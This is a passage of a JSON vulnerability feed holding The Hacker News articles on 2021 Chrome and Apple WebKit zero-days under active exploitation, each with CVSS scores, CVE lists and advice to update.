"cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551", "CVE-2021-30554"], "modified": "2021-06-18T03:33:11", "id": "THN:62ECC5B73032124D6559355B66E1C469", "href": "https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-QHv1N-h4fZY/YD8letBQzWI/AAAAAAAAB64/E1KslMnXt0oEcr7e27y2idTnPPl_nm3VQCLcBGAsYHQ/s0/chrome-hacking.jpg>)\n\nExactly a month after [patching](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) an actively exploited zero-day flaw in Chrome, Google today rolled out fixes for yet another zero-day vulnerability in the world's most popular web browser that it says is being abused in the wild.\n\nChrome 89.0.4389.72, released by the search giant for Windows, Mac, and Linux on Tuesday, comes with a total of 47 security fixes, the most severe of which concerns an \"object lifecycle issue in audio.\"\n\nTracked as CVE-2021-21166, the security flaw is one of the two bugs reported last month by Alison Huffman of Microsoft Browser Vulnerability Research on February 11. A separate object lifecycle flaw, also identified in the audio component, was reported to Google on February 4, the same day the stable version of Chrome 88 became available.\n\nWith no additional details, it's not immediately clear if the two security shortcomings are related.\n\n[](<https://thehackernews.com/images/--VPerofAuok/YD8mK08wMrI/AAAAAAAAB7I/VkM_Pg08vFQEvCxV3HbTbaDEd1HRja87QCLcBGAsYHQ/s0/hacking.jpg>)\n\nGoogle acknowledged that an exploit for the vulnerability exists in the wild but stopped short of sharing more specifics to allow a majority of users to install the fixes and prevent other threat actors from creating exploits targeting this zero-day.\n\n\"Google is aware of reports that an exploit for CVE-2021-21166 exists in the wild,\" Chrome Technical Program Manager Prudhvikumar Bommana [said](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>).\n\nThis is the second zero-day flaw in Chrome that Google has addressed since the start of the year.\n\nOn February 4, the company [issued a fix](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) for an actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine. Additionally, Google last year [resolved five Chrome zero-days](<https://thehackernews.com/2020/11/two-new-chrome-0-days-under-active.html>) that were actively exploited in the wild in a span of one month between October 20 and November 12.\n\nChrome users can update to the latest version by heading to Settings &gt; Help &gt; About Google Chrome to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-03T06:03:00", "type": "thn", "title": "New Chrome 0-day Bug Under Active Attacks \u2013 Update Your Browser ASAP!", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166"], "modified": "2021-03-13T02:55:42", "id": "THN:EF50BA60FF5E3EF9AF1570FF5A2589A0", "href": "https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:20", "description": "[](<https://thehackernews.com/images/--Br-zb7NQb0/YPEUTqMvgsI/AAAAAAAADNw/cesEHjkHFKgyqC_MTP_ji5iUXUCeqoH1QCLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle has pushed out a new security update to Chrome browser for Windows, Mac, and Linux with multiple fixes, including a zero-day that it says is being exploited in the wild.\n\nThe latest patch resolves a total of eight issues, one of which concerns a type confusion issue in its V8 open-source and JavaScript engine ([CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>)). The search giant credited an anonymous researcher for reporting the flaw on July 12.\n\nAs is usually the case with actively exploited flaws, the company issued a terse statement acknowledging that \"an exploit for CVE-2021-30563 exists in the wild\" while refraining from sharing full details about the underlying vulnerability used in the attacks due to its serious nature and the possibility that doing so could lead to further abuse.\n\nCVE-2021-30563 also marks the ninth zero-day addressed by Google to combat real-world attacks against Chrome users since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [**CVE-2021-30554**](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n\nChrome users are advised to update to the latest version (91.0.4472.164) by heading to Settings &gt; Help &gt; 'About Google Chrome' to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-16T05:08:00", "type": "thn", "title": "Update Your Chrome Browser to Patch New Zero\u2011Day Bug Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563"], "modified": "2021-07-16T05:08:47", "id": "THN:C736174C6B0ADC38AA88BC58F30271DA", "href": "https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:02", "description": "[](<https://thehackernews.com/images/-tnjJ0FH8P0I/YEwt7ddHBcI/AAAAAAAACB8/2lR87aM5jBAUOKikDOdI3SWSC9ZG92FcgCLcBGAsYHQ/s0/chrome-browser-update.jpg>)\n\nGoogle has addressed yet another actively exploited zero-day in Chrome browser, marking the second such fix released by the company within a month.\n\nThe browser maker on Friday shipped 89.0.4389.90 for Windows, Mac, and Linux, which is expected to be rolling out over the coming days/weeks to all users.\n\nWhile the update contains a total of five security fixes, the most important flaw rectified by Google concerns a [use after free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in its Blink rendering engine. The bug is tracked as CVE-2021-21193.\n\nDetails about the flaw are scarce except that it was reported to Google by an anonymous researcher on March 9.\n\nAccording to IBM, the vulnerability is rated 8.8 out of 10 on the CVSS scale, and could allow a remote attacker to execute arbitrary code on the target system. \"By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system,\" the report stated.\n\nAs is usually the case with actively exploited flaws, Google issued a terse statement acknowledging that an exploit for CVE-2021-21193 existed but refrained from sharing additional information until a majority of users are updated with the fixes and prevent other threat actors from creating exploits targeting this zero-day.\n\n[](<https://thehackernews.com/images/-4e8UqaJKLag/YEwrYTe6kaI/AAAAAAAACB0/A61b0Tzs5nIymspbYAAIoURKA3zV5lE2QCLcBGAsYHQ/s0/chrome-zero-day.jpg>)\n\n\"Google is aware of reports that an exploit for CVE-2021-21193 exists in the wild,\" Chrome Technical Program Manager Prudhvikumar Bommana [noted](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>) in a blog post.\n\nWith this update, Google has fixed three zero-day flaws in Chrome since the start of the year.\n\nEarlier this month, the company issued a fix for an \"object lifecycle issue in audio\" (CVE-2021-21166) which it said was being actively exploited. Then on February 4, the company resolved another actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine.\n\nChrome users can update to the latest version by heading to Settings &gt; Help &gt; About Google Chrome to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-13T03:16:00", "type": "thn", "title": "Another Google Chrome 0-Day Bug Found Actively Exploited In-the-Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193"], "modified": "2021-03-16T04:51:58", "id": "THN:15BF409706D7240A5276C705732D745F", "href": "https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:19", "description": "[](<https://thehackernews.com/images/-FOgCdN3CSOk/YUAgGS1bB1I/AAAAAAAADyc/2oKkq_Mon1AnpsrRVosSNgmXm6ZdbQTXACLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle on Monday released security updates for Chrome web browser to address a total of 11 security issues, two of which it says are actively exploited zero-days in the wild.\n\nTracked as **CVE-2021-30632** and **CVE-2021-30633**, the [vulnerabilities](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) concern an out of bounds write in V8 JavaScript engine and a use after free flaw in Indexed DB API respectively, with the internet giant crediting anonymous researchers for reporting the bugs on September 8.\n\nAs is typically the case, the company said it's \"aware that exploits for CVE-2021-30632 and CVE-2021-30633 exist in the wild\" without sharing additional specifics about how, when, and where the vulnerabilities were exploited, or the threat actors that may be abusing them.\n\nWith these two security shortcomings, Google has addressed a total of 11 zero-day vulnerabilities in Chrome since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [**CVE-2021-30554**](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [**CVE-2021-30563**](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n\nChrome users are advised to update to the latest version (93.0.4577.82) for Windows, Mac, and Linux by heading to Settings &gt; Help &gt; 'About Google Chrome' to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-09-14T04:08:00", "type": "thn", "title": "Update Google Chrome to Patch 2 New Zero-Day Flaws Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633"], "modified": "2021-09-19T08:13:46", "id": "THN:1A836FDDE57334BC4DAFA65E6DFA02E4", "href": "https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:16", "description": "[](<https://thehackernews.com/images/-EBTuV2RF5wo/YU6_b4n3Y4I/AAAAAAAAD5w/Rv4cfNWgTzsitUR4O-m9Hoo5Jsb-IyxJACLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle on Friday rolled out an emergency security patch to its Chrome web browser to address a security flaw that's known to have an exploit in the wild.\n\nTracked as [CVE-2021-37973](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_24.html>), the vulnerability has been described as [use after free](<https://cwe.mitre.org/data/definitions/416.html>) in [Portals API](<https://web.dev/hands-on-portals/>), a web page navigation system that enables a page to show another page as an inset and \"perform a seamless transition to a new state, where the formerly-inset page becomes the top-level document.\"\n\nCl\u00e9ment Lecigne of Google Threat Analysis Group (TAG) has been credited with reporting the flaw. Additional specifics pertaining to the weakness have not been disclosed in light of active exploitation and to allow a majority of the users to apply the patch, but the internet giant said it's \"aware that an exploit for CVE-2021-37973 exists in the wild.\"\n\nThe update arrives a day after Apple moved to close an actively exploited security hole in older versions of iOS and macOS ([CVE-2021-30869](<https://thehackernews.com/2021/09/urgent-apple-ios-and-macos-updates.html>)), which the TAG noted as being \"used in conjunction with a N-day remote code execution targeting WebKit.\" With the latest fix, Google has addressed a total of [12 zero-day flaws in Chrome](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) since the start of 2021:\n\n * [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [CVE-2021-21206](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [CVE-2021-21220](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [CVE-2021-30551](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [CVE-2021-30554](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [CVE-2021-30563](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * [CVE-2021-30632](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [CVE-2021-30633](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n\nChrome users are advised to update to the latest version (94.0.4606.61) for Windows, Mac, and Linux by heading to Settings &gt; Help &gt; 'About Google Chrome' to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-09-25T06:39:00", "type": "thn", "title": "Urgent Chrome Update Released to Patch Actively Exploited Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30869", "CVE-2021-37973"], "modified": "2021-09-27T04:38:24", "id": "THN:6A9CD6F085628D08978727C0FF597535", "href": "https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:24", "description": "[](<https://thehackernews.com/images/-5Zi_45-pXus/YF7LgsUU1pI/AAAAAAAACHQ/ltYZDuSTuqwbzRstY55f-hwWOXjS_zI2gCLcBGAsYHQ/s0/mac-malware-proxy-setting.png>)\n\nMerely weeks after releasing out-of-band patches for iOS, iPadOS, macOS and watchOS, Apple has issued yet another security update for iPhone, iPad, and Apple Watch to fix a critical zero-day weakness that it says is being actively exploited in the wild.\n\nTracked as **CVE-2021-1879**, the vulnerability relates to a WebKit flaw that could enable adversaries to process maliciously crafted web content that may result in universal cross-site scripting attacks.\n\n\"This issue was addressed by improved management of object lifetimes,\" the iPhone maker noted.\n\nApple has credited Clement Lecigne and Billy Leonard of Google's Threat Analysis Group for discovering and reporting the issue. While details of the flaw have not been disclosed, the company said it's aware of reports that CVE-2021-1879 may have been actively exploited.\n\nUpdates are available for the following devices:\n\n * [iOS 12.5.2](<https://support.apple.com/en-us/HT212257>) \\- Phone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation)\n * [iOS 14.4.2](<https://support.apple.com/en-us/HT212256>) \\- iPhone 6s and later, and iPod touch (7th generation)\n * [iPadOS 14.4.2](<https://support.apple.com/en-us/HT212256>) \\- iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later\n * [watchOS 7.3.3](<https://support.apple.com/en-us/HT212258>) \\- Apple Watch Series 3 and later\n\nThe latest release arrives close on the heels of a patch for a separate WebKit flaw ([CVE-2021-1844](<https://thehackernews.com/2021/03/apple-issues-patch-for-remote-hacking.html>)) that Apple shipped earlier this month. In January 2021, the company resolved [three zero-day vulnerabilities](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (CVE-2021-1782, CVE-2021-1870, and CVE-2021-1871) that allowed an attacker to elevate privileges and achieve remote code execution.\n\nInterestingly, Apple also appears to be [experimenting](<https://thehackernews.com/2021/03/apple-may-start-delivering-security.html>) with ways to deliver security updates on iOS in a manner that's independent of other OS updates. iOS 14.4.2 certainly sounds like the kind of update that could benefit from this feature.\n\nIn the meanwhile, users of Apple devices are advised to install the updates as soon as possible to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-27T06:07:00", "type": "thn", "title": "Apple Issues Urgent Patch Update for Another Zero\u2011Day Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1782", "CVE-2021-1844", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879"], "modified": "2021-03-27T08:51:29", "id": "THN:4EFE9C3A3A0DEB0019296A14C9EAC1FA", "href": "https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:14", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEggQTDQ-V9WbcSJKwsXKGeYWFxP3jSKikqYhYG8xpFa_NiB7aFJV8tcR11eRFpoq9nIOMlHfbefT2pZC9vdUHCul3SAafHr4t5T-oIIj-H61WEAlv8x9Mfzo1cqzuxor4bqF090P_C7w7fQqzoSFEmUVm1PvbmzU9YENMC2O_ZAEkOC_qbBbzYZdzhA>)\n\nGoogle on Thursday pushed urgent security fixes for its Chrome browser, including a pair of new security weaknesses that the company said are being exploited in the wild, making them the fourth and fifth actively zero-days plugged this month alone.\n\nThe issues, designated as [CVE-2021-37975 and CVE-2021-37976](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html>), are part of a total of four patches, and concern a [use-after-free flaw](<https://cwe.mitre.org/data/definitions/416.html>) in V8 JavaScript and WebAssembly engine as well as an information leak in core.\n\nAs is usually the case, the tech giant has refrained from sharing any additional details regarding how these zero-day vulnerabilities were used in attacks so as to allow a majority of users to be updated with the patches, but noted that it's aware that \"exploits for CVE-2021-37975 and CVE-2021-37976 exist in the wild.\"\n\nAn anonymous researcher has been credited with reporting CVE-2021-37975. The discovery of CVE-2021-37976, on the other hand, involves Cl\u00e9ment Lecigne from Google Threat Analysis Group, who was also credited with [CVE-2021-37973](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>), another actively exploited use-after-free vulnerability in Chrome's Portals API that was reported last week, raising the possibility that the two flaws may have been stringed together as part of an exploit chain to execute arbitrary code.\n\nWith the latest update, Google has addressed a record 14 zero-days in the web browser since the start of the year.\n\n * [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [CVE-2021-21206](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [CVE-2021-21220](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [CVE-2021-30551](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [CVE-2021-30554](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [CVE-2021-30563](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * [CVE-2021-30632](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [CVE-2021-30633](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n * [CVE-2021-37973](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>) \\- Use-after-free in Portals\n\nChrome users are advised to update to the latest version (94.0.4606.71) for Windows, Mac, and Linux by heading to Settings &gt; Help &gt; 'About Google Chrome' to mitigate any potential risk of active exploitation.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": 